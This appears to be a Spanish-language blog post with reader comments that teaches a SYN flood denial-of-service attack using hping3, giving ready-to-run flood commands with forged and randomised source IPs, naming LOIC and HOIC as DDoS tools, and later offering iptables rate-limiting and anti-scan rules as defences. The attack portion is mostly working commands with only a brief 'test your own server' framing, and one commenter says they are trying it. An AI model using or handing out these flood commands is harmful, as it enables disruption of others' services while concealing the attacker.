La herramienta se llama hping3.
Con esta herramienta podremos realizar ataque SYN Flood Attack (DDos) denegando servicios a otras máquinas.
– Para empezar debemos instalar el paquete:
sudo apt-get install hping3
– Una vez instalado, realizaremos el ataque DDos, escribiendo esto en un terminal:
hping3 -p 80 -S –flood ip_atacada
Por ejemplo:
hping3 -p 80 -S –flood 192.168.1.15
-También podemos hacer que nuestra ip no sea visible de la siguiente manera:
hping3 -a ip_falsa -p 80 -S –flood ip_atacada
Por ejemplo:
hping3 -a 192.168.1.234 -p 80 -S –flood 192.168.1.15
-Otra forma es usando –rand-source y de esta manera genera un ip falsa aleatoria:
hping3 –rand-source -p 80 -S –flood ip_atacada
Por ejemplo:
hping3 –rand-source -p 80 -S –flood 192.168.1.15
Prueben y refuercen su seguridad en Apache, Lighttpd, Ngix, Cherokee, etc…
Saludos y espero les sea útil.







Otros programas que nos pueden ayudar a autoatacarnos son LOIC[low orbit ion cannon] y HOIC[high orbit ion cannon], cuya función principal es los DDoS.
Y cual seria el paso a seguir?
IPTABLES?
Añade a iptables reglas de conteo de paquetes, para el puerto 80, es decir, 10 paquetes por segundo, o algo similar. También agregar reglas para evitar spoofeo, netscanning, evitar paquetes inválidos, etc. Por ejemplo:
iptables -A INPUT -p tcp ! –syn -j REJECT –reject-with tcp-reset
iptables -A INPUT -m state –state INVALID -j DROP
iptables -A INPUT -p tcp -m tcp –tcp-flags SYN,RST,ACK SYN -m limit –limit 1/sec -j ACCEPT
iptables -A INPUT -p tcp -m tcp –tcp-flags FIN,SYN,RST,ACK RST -m limit –limit 1/sec -j ACCEPT
#Esta regla requiere el módulo «recent». Se añade cada ip que se conecte a la tabla de recent. Por por cada ip en la tabla de recent si hace mas de x hits en x segundos, se dropea.
modprobe ipt_recent
iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –set
iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 10 –hitcount 10 -j DROP
#Permitir el ping, pero a 1 paquete por segundo, para evitar un ataque ICMP Flood
iptables -A INPUT -p icmp -m state –state NEW –icmp-type echo-request -m limit –limit 1/s –limit-burst 1 -j ACCEPT
iptables -A INPUT -p icmp -j DROP
# Evitar que nos escaneen la red…
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE –j DROP
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags SYN,FIN SYN,FIN –j DROP
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags SYN,RST SYN,RST –j DROP
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags FIN,RST FIN,RST –j DROP
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags ACK,FIN FIN –j DROP
iptables -A INPUT -i $ETH -p tcp -m tcp –tcp-flags ACK,URG URG –j DROP
Hay multiples opciones, solo hay que estudiar y probar. Un saludo @elMor3no.
Voy a probar jajaja.. que fula..
Me salta un error:
hping3: you must specify only one target host at a time
:S
Revisa lo que estas haciendo, creo que debes poner solo un host a la vez…